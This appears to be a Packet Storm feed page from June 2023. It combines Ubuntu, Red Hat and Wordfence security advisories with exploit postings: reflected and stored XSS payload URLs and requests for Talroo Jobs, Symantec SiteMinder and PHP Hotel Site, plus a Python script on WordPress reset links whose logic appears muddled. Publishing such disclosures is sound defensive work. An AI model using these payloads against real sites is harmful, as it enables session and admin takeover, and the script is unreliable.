Talroo Jobs Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/talroo-jobs                                    ││  Vendor   : NetArt Media                                                               ││  Software : Talroo Jobs Script 1.0                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=jobs&category=1&lrw3e"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"k1n44=1[-] Done

Talroo Jobs Script 1.0 Cross Site Scripting

Ubuntu Security Notice 6168-2 - USN-6168-1 fixed a vulnerability in libx11. This update provides the corresponding update for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM, and Ubuntu 18.04 ESM. Gregory James Duck discovered that libx11 incorrectly handled certain Request, Event, or Error IDs. If a user were tricked into connecting to a malicious X Server, a remote attacker could possibly use this issue to cause libx11 to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6168-2June 20, 2023libx11 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)- Ubuntu 14.04 LTS (Available with Ubuntu Pro)Summary:libx11 could be made to crash if it received specially crafted networktraffic.Software Description:- libx11: X11 client-side libraryDetails:USN-6168-1 fixed a vulnerability in libx11. This update providesthe corresponding update for Ubuntu 14.04 ESM, Ubuntu 16.04 ESM,and Ubuntu 18.04 ESM.Original advisory details: Gregory James Duck discovered that libx11 incorrectly handled certain Request, Event, or Error IDs. If a user were tricked into connecting to a malicious X Server, a remote attacker could possibly use this issue to cause libx11 to crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):  libx11-6                        2:1.6.4-3ubuntu0.4+esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):  libx11-6                        2:1.6.3-1ubuntu2.2+esm2Ubuntu 14.04 LTS (Available with Ubuntu Pro):  libx11-6                        2:1.6.2-1ubuntu2.1+esm3After a standard system update you need to reboot your computer to make allthe necessary changes.References:  https://ubuntu.com/security/notices/USN-6168-2  https://ubuntu.com/security/notices/USN-6168-1  CVE-2023-3138

Ubuntu Security Notice USN-6168-2

WordPress BookIt plugin versions 2.3.7 and below suffer from an authentication bypass vulnerability.

    On May 22, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for an Authentication Bypass vulnerability in StylemixThemes’s BookIt plugin, which is actively installed on more than 10,000 WordPress websites. The vulnerability makes it possible for an attacker to gain access to any account on the site, including the administrator account, if the attacker knows their email address.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.We contacted StylemixThemes on May 22, 2023, and received a response the next day. After providing full disclosure details, the developer released the first patch on May 31, 2023, which still contained a vulnerability and then released the fully patch on June 13, 2023. We would like to commend the StylemixThemes development team for their prompt response and timely patch.We urge users to update their sites with the latest patched version of BookIt, version 2.3.8 at the time of this writing, as soon as possible.READ THIS POST ON THE BLOGVulnerability Summary from Wordfence IntelligenceDescription: BookIt <= 2.3.7 – Authentication Bypass Affected Plugin: Booking Calendar | Appointment Booking | BookItPlugin Slug: bookitAffected Versions: <= 2.3.7CVE ID: CVE-2023-2834CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/Researcher/s: Lana Codes Fully Patched Version: 2.3.8The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.Technical AnalysisThe BookIt plugin provides the shortcode ‘[bookit]‘ to embed an appointment booking calendar into a page on a WordPress site. By using this functionality, after selecting the date and time in the calendar, it is possible to book an appointment by providing the name, email address, and password for registration.Examining the code reveals that the plugin checks for the user id based on the email address supplied via the ‘email’ parameter. If the email belongs to an existing WordPress user, it will associate the request to that user and set the authentication cookies for that user.[View this code snippet on the blog]  Unfortunately, this functionality was insecurely implemented as it does not include any authentication checks such as password verification. It is simply looking for an identity and authorizing that claim without proper verification and authentication.This makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plugin. As always, this makes it easy for threat actors to completely compromise a vulnerable WordPress site and further infect the victim.Disclosure TimelineMay 22, 2023 – Discovery of the Authentication Bypass vulnerability in BookIt.May 22, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.May 22, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability.May 23, 2023 – The vendor confirms the inbox for handling the discussion.May 23, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.June 13, 2023 – A fully patched version of the plugin, 2.3.8, is released.July 21, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we have detailed an Authentication Bypass vulnerability within the BookIt plugin affecting versions 2.3.7 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to accounts of users, if the attacker knows the email address. The vulnerability has been fully addressed in version 2.3.8 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of BookIt as soon as possible.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 22, 2023. Sites still using the free version of Wordfence will receive the same protection on June 21, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress BookIt 2.3.7 Authentication Bypass

Ubuntu Security Notice 6179-1 - It was discovered that Jettison incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6179-1  
June 20, 2023

libjettison-java vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

Jettison could be made to crash if it opened a specially crafted  
file.

Software Description:  
- libjettison-java: A Java library for converting XML to JSON and vice-versa

Details:

It was discovered that Jettison incorrectly handled certain inputs. If a  
user or an automated system were tricked into opening a specially crafted  
input file, a remote attacker could possibly use this issue to cause a  
denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libjettison-java                1.5.3-1ubuntu0.1

Ubuntu 22.10:  
   libjettison-java                1.4.1-1ubuntu0.22.10.2

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   libjettison-java                1.4.1-1ubuntu0.22.04.1+esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   libjettison-java                1.4.0-1ubuntu0.20.04.1+esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libjettison-java                1.4.0-1ubuntu0.18.04.1~esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libjettison-java                1.2-3ubuntu0.1~esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6179-1  
   CVE-2023-1436

Package Information:  
   https://launchpad.net/ubuntu/+source/libjettison-java/1.5.3-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/libjettison-java/1.4.1-1ubuntu0.22.10.2

Ubuntu Security Notice USN-6179-1

Ubuntu Security Notice 6178-1 - It was discovered that in SVG++ library that the demo application incorrectly managed memory resulting in a memory access violation under certain circumstances. An attacker could possibly use this issue to leak memory information or run a denial of service attack. This issue only affected Ubuntu 18.04 LTS. It was discovered that in SVG++ library that the demo application incorrectly handled null pointers under certain circumstances. An attacker could possibly use this issue to cause denial of service, leak memory information or manipulate program execution flow.

==========================================================================  
Ubuntu Security Notice USN-6178-1  
June 19, 2023

Several security issues were fixed in SVG++ library  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Details:

It was discovered that in SVG++ library that the demo application incorrectly  
managed memory resulting in a memory access violation  
under certain circumstances. An attacker could possibly use this issue  
to leak memory information or run a denial of service attack.  
This issue only affected Ubuntu 18.04 LTS. (CVE-2019-6246)

It was discovered that in SVG++ library that the demo application  
incorrectly handled null pointers under certain circumstances.  
An attacker could possibly use this issue to cause  
denial of service, leak memory information or manipulate  
program execution flow. (CVE-2021-44960)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   libsvgpp-dev                    1.3.0+dfsg1-3ubuntu2.22.10.1

Ubuntu 22.04 LTS:  
   libsvgpp-dev                    1.3.0+dfsg1-3ubuntu2.22.04.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libsvgpp-dev                    1.2.3+dfsg1-3ubuntu1+esm1

The problem can be corrected by updating your system to the following package versions:

References:  
   https://ubuntu.com/security/notices/USN-6178-1  
   CVE-2019-6246, CVE-2021-44960

Package Information:  
   https://launchpad.net/ubuntu/+source/svgpp/1.3.0+dfsg1-3ubuntu2.22.10.1  
   https://launchpad.net/ubuntu/+source/svgpp/1.3.0+dfsg1-3ubuntu2.22.04.1

Ubuntu Security Notice USN-6178-1

Symantec SiteMinder WebAgent version 12.52 suffers from a cross site scripting vulnerability.

    Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)Google Dork: N/ADate: 18-06-2023Exploit Author: Harshit JoshiVendor Homepage: https://community.broadcom.com/homeSoftware Link: https://www.broadcom.com/products/identity/siteminderVersion:  12.52Tested on: Linux, WindowsCVE: CVE-2023-23956Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221*Description:*I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I havediscovered in the  Symantec SiteMinder WebAgent. The vulnerability isrelated to the improper handling of user input and has been assigned theCommon Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for thisvulnerability is 5.4.Vulnerability Details:---------------------*Impact:*This vulnerability allows an attacker to execute arbitrary JavaScript codein the context of the affected application.*Steps to Reproduce:**First:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *SMAGENTNAME *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="**Second:*1) Visit -https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%222) After visiting the above URL, click on the "*Change Password*" button,and the popup will appear.- The *TARGET *parameter is the source of this vulnerability.*- Payload Used: **-SM-/" onfocus="alert(1)" autofocus="*

Symantec SiteMinder WebAgent 12.52 Cross Site Scripting

NetArt Media PHP Hotel Site version 2.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/php-hotel-booking                              ││  Vendor   : NetArt Media                                                               ││  Software : PHP Hotel Site 2.0                                                         ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /booking/index.php HTTP/2page=book&id=0&room_code=F753N132&room_name=Standard+double+room&price=&start_time=1687237200&end_time=1687410000&nights=&ProceedBooking=1&name=[XSS Payload]&email=abc%40abc.com&phone=[XSS Payload]&code=28649&remarks=[XSS Payload]-----------------------------------------------POST parameter 'name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'remarks' is vulnerable to XSS## Steps to Reproduce:1. At the index page Search for your Booking (as Guest)2. Select any Room by Press [Book Now]3. Inject your [XSS Payload] in "Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Remarks "6. Press [Book Now] to Submit You will receive to (Thank you. You'll receive an email when your booking is confirmed.)6. When the Admin Login to the Administration Panel on this Path (https://website/booking/admin/index.php)7. XSS will Fire & Executed on his Browser Instantly After the Login[-] Done

NetArt Media PHP Hotel Site 2.0 Cross Site Scripting

Red Hat Security Advisory 2023-3677-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3677-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3677  
Issue date:        2023-06-20  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux BaseOS E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_4.2.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-devel-1.13.0-5.el8_4.2.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v.8.4):

Source:  
c-ares-1.13.0-5.el8_4.2.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_4.2.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.s390x.rpm  
c-ares-devel-1.13.0-5.el8_4.2.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_4.2.i686.rpm  
c-ares-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_4.2.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_4.2.i686.rpm  
c-ares-devel-1.13.0-5.el8_4.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJGf/9zjgjWX9erEAQh3qhAAl74xXfT8cPd/mANEZYuASoaIelFbDyHT  
/U2b1y/JstPgQ1CbvVORE5hOkI7drwE3C2STG2WLNjXv1rqyP0BJmYW7Y2gPNML8  
GzX1SAv9pvwyogJx4BjPzsSPV5RhFXyrXB43RzT5topJwNAokYOGjxM6yrxObTZN  
KitSozcArD2DCXIugHkBsLkFTSYiSiMxD/ckQ71j+HQY6AsazEpg95nbI+039DOk  
JlWNnXkHU6Softb4Nj4VFKPPHG2zb2lA16ptDMEBdprBwOZ9IlV3+6F21Ml7yRoc  
BT4mMXBhQ8N2PyEeQYJQL32mYjCaLu7LttgWDupL1Zj/nsgagrfQnDez6tqwvQzF  
0A7auw2esxzUb99JTTKUOlquD4ezzXZee/jY2tvg0Wmnpa5zF6eAU+EvnjRybach  
YcJ+I34zXE3w2hqzJdRid1s5xIpygIj7ebqWO54GOJRdIZB1iYoLoyjVkjxAI26n  
Je/YhrBBeSX8Laz+AD3qp80WE1EPXn9DWcW/KlowZHN9VD5b/6BRqVls1cVQFfDB  
aBBlLRO85sHlIe13YIHoQwfw8sN7cfQF67AT7YeBfl5l0Y7DsHtYGAi8x2OM27Rs  
Znm96i+s2o5i2FAkjCo0+FjzYJ0lJ5aQ5SVFoluSabLsUNCKT31zaGVe+JOWVP5S  
XVnYxk23dRM=  
=i0cM  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3677-01

Red Hat Security Advisory 2023-3665-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3665-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3665  
Issue date:        2023-06-19  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
c-ares-1.13.0-5.el8_1.1.src.rpm

aarch64:  
c-ares-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.aarch64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.aarch64.rpm

ppc64le:  
c-ares-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.ppc64le.rpm  
c-ares-devel-1.13.0-5.el8_1.1.ppc64le.rpm

s390x:  
c-ares-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.s390x.rpm  
c-ares-devel-1.13.0-5.el8_1.1.s390x.rpm

x86_64:  
c-ares-1.13.0-5.el8_1.1.i686.rpm  
c-ares-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debuginfo-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.i686.rpm  
c-ares-debugsource-1.13.0-5.el8_1.1.x86_64.rpm  
c-ares-devel-1.13.0-5.el8_1.1.i686.rpm  
c-ares-devel-1.13.0-5.el8_1.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJCi3dzjgjWX9erEAQhekA/+Kf1uGXbkxvv+xsdJnq+l52nR502WaIkD  
eKnu3niqW/ZarvBJZRibDUTmM2NIX7D49SPO5WmR/KcPGnkqh4B+TC+TinMOiopi  
KnMnugqL/ABB0zEQekuwCFpBxOxn4pSNNADJeu1mTo8Zoun/6cMhXtBNF9Miesuv  
Ff9y1jNBwOyX5cMgQLuGEVcB0MOsZmWt/nA5kcL72rI0EUQme/+P194jh6RdmzbV  
bHE4IVCF71Xmz3tTItgcs9O0igzKLh3wdM3Kts89SX/WQRjBwS/pRV2d66Q59ySg  
qcsBZMR0Isn+8EyzWwlj4UjXrSCVayu9KoBAVX/Pq8cXJyBbIKoPh9YL4/AcegvX  
xZDkLMdQqxXTnj8uwY+TFTOtATrvMXpJp9WMS7HeGwvkdO4Enm1vyrPNinK8ERCH  
F6Mc0eLOFHn1p9rCPM6FhT27bOX0YZw59PIQxiszGihKojfLqxy6dv5cS8L7Yaiw  
kP0Eed2e9j3wDm7bvpy/u7hZ7det+/uUp5PAd3Bvk+VW8WMu4oU4iLkac9zFhyOI  
QG1q6YAvkEepzo/X2WzcA7NKBUHKMSXhk5K7hD3LBJEpXObLmksE34QCs20dKxsd  
Nm+DH4QtkXhAik1Irrnw5+pa0tdr9RDVfz1fp0wtFn7sDz7Rkn7dIBOtqhudxSOj  
P1vqcBWcX+I=  
=2MFa  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3665-01

WordPress Theme Medic theme version 1.0.0 suffers from having a weak password recovery mechanism for the forgot password flow.

    # Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password# Dork: inurl:/wp-includes/class-wp-query.php# Date: 2023-06-19# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html# Version: 1.0.0 (REQUIRED)# Tested on: Windows/Linux# CVE: CVE-2020-11027import requestsfrom bs4 import BeautifulSoupfrom datetime import datetime, timedelta# Set the WordPress site URL and the user email addresssite_url = 'https://example.com'user_email = 'user@example.com'# Get the password reset link from the user email# You can use any email client or library to retrieve the email# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'with open('password_reset_email.html', 'r') as f:    email = f.read()    soup = BeautifulSoup(email, 'html.parser')    reset_link = soup.find('a', href=True)['href']    print(f'Reset Link: {reset_link}')# Check if the password reset link expires upon changing the user passwordresponse = requests.get(reset_link)if response.status_code == 200:    # Get the expiration date from the reset link HTML    soup = BeautifulSoup(response.text, 'html.parser')    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')    print(f'Expiration Date: {expiration_date}')    # Check if the expiration date is less than 24 hours from now    if expiration_date < datetime.now() + timedelta(hours=24):        print('Password reset link expires upon changing the user password.')    else:        print('Password reset link does not expire upon changing the user password.')else:    print(f'Error fetching reset link: {response.status_code} {response.text}')    exit()

Source

Packet Storm